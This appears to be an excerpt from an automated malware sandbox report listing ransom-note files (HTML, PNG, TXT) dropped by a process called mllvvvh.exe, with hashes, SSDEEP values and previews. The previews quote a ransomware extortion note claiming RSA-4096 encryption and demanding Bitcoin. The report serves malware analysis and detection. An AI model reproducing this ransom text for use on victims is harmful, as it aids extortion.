                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Diagnosis\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\IdentityCRL\INT\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\IdentityCRL\INT\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\IdentityCRL\INT\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\IdentityCRL\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\IdentityCRL\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\IdentityCRL\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\IdentityCRL\production\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\IdentityCRL\production\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\IdentityCRL\production\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\IdentityCRL\production\temp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\IdentityCRL\production\temp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
